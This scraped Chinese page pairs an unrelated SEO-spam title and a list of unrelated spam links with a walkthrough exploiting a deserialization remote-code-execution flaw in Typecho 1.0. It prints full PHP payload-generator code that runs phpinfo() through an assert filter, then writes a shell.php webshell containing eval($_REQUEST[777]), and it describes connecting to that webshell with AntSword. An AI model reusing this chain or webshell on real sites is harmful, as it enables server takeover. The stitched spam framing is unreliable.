当前位置: 首页 > news >正文

做vlogger的网站有哪些dw网页设计模板网站

做vlogger的网站有哪些,dw网页设计模板网站,南昌整站优化,做网站找什么公司文章目录 执行phpinfogetshell 执行phpinfo 将下面这段代码复制到一个php文件&#xff0c;命名为typecho_1.0-14.10.10_unserialize_phpinfo.php&#xff0c;代码中定义的类名与typecho中的类相同&#xff0c;是它能识别的类&#xff1a; <?php class Typecho_Feed{const…

文章目录

  • 执行phpinfo
  • getshell

执行phpinfo

将下面这段代码复制到一个php文件,命名为typecho_1.0-14.10.10_unserialize_phpinfo.php,代码中定义的类名与typecho中的类相同,是它能识别的类:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'phpinfo()';$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

将文件放到虚拟机C:\phpstudy_2016\WWW\unserialize的目录下,打开后可以获得它的base64编码:

在这里插入图片描述

在typecho主页用hackbar进行代码注入,注入成功就说明此处存在RCE漏洞:

在这里插入图片描述

注入成功(说明此处存在RCE漏洞,也可以尝试getshell),回显出phpinfo界面:

在这里插入图片描述

getshell

同上,将这段利用代码复制到php文件中:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = "fputs(fopen('shell.php', w), '<?php phpinfo();@eval(\$_REQUEST[777])?>')";$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

打开:
在这里插入图片描述

在hackbar中执行:

在这里插入图片描述

页面回显正常:

在这里插入图片描述

在typecho根目录下已经成功写入一个shell.php文件,里面包含一句话木马,并可以正常访问:

在这里插入图片描述

蚁剑测试连接成功:

在这里插入图片描述

成功获取webshell:

在这里插入图片描述

http://www.zhongyajixie.com/news/23332.html

相关文章:

  • 有没有代做模型的网站如何自创网站
  • 上海网站建设润滋网址关键词查询网站
  • 做外贸在哪个网站好给我免费的视频在线观看
  • wordpress 知名站点济南优化网站关键词
  • 有了域名之后怎么做网站百度推广seo效果怎么样
  • 企业网站排名要怎么做seo智能优化
  • 东营做网站m0536南昌百度seo
  • 深圳市手机网站建设品牌游戏推广怎么做引流
  • 温州专业微网站制作公司哪家好seo软件哪个好
  • 浙江省住房与城乡建设部网站公司官网模板
  • 做网站主流语言免费推广网站平台
  • 辽宁省建设银行e护航网站关键词优化搜索排名
  • 中国企业500强2021名单长沙seo优化服务
  • 构建网站需要会什么意思seo综合查询工具下载
  • 怎么做代刷网站教程网络推广运营
  • 网站开发不兼容ie8千锋培训机构官网
  • 中小企业建网站哪个好网络优化大师手机版
  • 深圳罗湖做网站东莞关键词优化实力乐云seo
  • 金融网站怎么做的拓客渠道有哪些
  • 武汉网站建设yundaowseo兼职论坛
  • 济南抖音seo电脑优化
  • 广州番禺区有什么好玩的景点刷移动关键词优化
  • 企业网站备案名称窍门如何在互联网上做推广
  • 免费做网站txt外链制作公司网页多少钱
  • 迪士尼网站是谁做的网址怎么创建
  • 遵义网站开发公司下载百度免费版
  • 南阳网站运营招聘信息微信指数是什么意思
  • 办公空间设计案例ppt网站优化建议
  • 成都网站改版兰州网络推广优化服务
  • wordpress嵌入哔哩哔哩视频乌海网站seo